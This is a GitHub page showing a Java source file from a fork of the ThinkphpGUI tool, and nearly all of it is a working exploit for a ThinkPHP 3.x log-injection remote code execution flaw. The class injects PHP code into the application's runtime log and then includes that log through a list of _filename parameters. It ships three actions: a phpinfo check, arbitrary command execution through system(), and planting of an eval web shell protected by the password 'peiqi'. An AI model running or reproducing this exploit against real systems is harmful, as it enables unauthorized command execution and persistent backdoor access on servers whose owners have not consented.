forked from Lotus6/ThinkphpGUI
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtp3_log_rce.java
More file actions
executable file
·87 lines (79 loc) · 3.86 KB
/
tp3_log_rce.java
File metadata and controls
executable file
·87 lines (79 loc) · 3.86 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
package exploit;
import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Result;
import java.util.ArrayList;
import java.util.Date;
/**
* Author 莲花 2021/7/21
*/
public class tp3_log_rce implements BasePayload {
Date dt = new Date();
String year = String.format("%tY", dt);
String mon = String.format("%tm", dt);
String day = String.format("%td", dt);
String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";
@Override
public Result checkVUL(String url) throws Exception {
String CheckStr = "PHP Version";
String payload_log = url + "?m=Home&c=Index&a=index&test=--><?=phpinfo();?>";
ArrayList<String> log_rces = new ArrayList<String>() {{
add(url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&info[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index¶m[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&name[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&array[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&arr[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&list[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&page[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&menus[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&var[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&data[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&module[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
}};
for (String log_rce : log_rces) {
try {
String log = HttpRequest.get(payload_log).body();
String res = HttpRequest.get(log_rce).body();
if (res.contains(CheckStr)) {
return new Result(true, "ThinkPHP 3.x Log RCE", log_rce);
}
} catch (Exception e) {
e.printStackTrace();
}
}
return new Result(false, "ThinkPHP 3.x Log RCE", "");
}
@Override
public Result exeVUL(String url, String cmd) throws Exception {
String log_exe = url + "/?m=Home&c=Index&a=index&test=--><?=system('"+cmd+"');?>";
String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
try {
String log = HttpRequest.get(log_exe).body();
int code = HttpRequest.get(log_res).code();
if (code == 200) {
return new Result(true, null, log_res);
}
}
catch (Exception e) {
e.printStackTrace();
}
return new Result(false, null, "");
}
@Override
public Result getShell(String url) throws Exception {
String log_shell = url + "/?m=Home&c=Index&a=index&test=--><?=@eval($_POST['peiqi']);?>";
String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
try {
String log = HttpRequest.get(log_shell).body();
int code = HttpRequest.get(log_res).code();
if (code == 200) {
return new Result(true, null, log_res+" Pass:peiqi");
}
}
catch (Exception e) {
e.printStackTrace();
}
return null;
}
}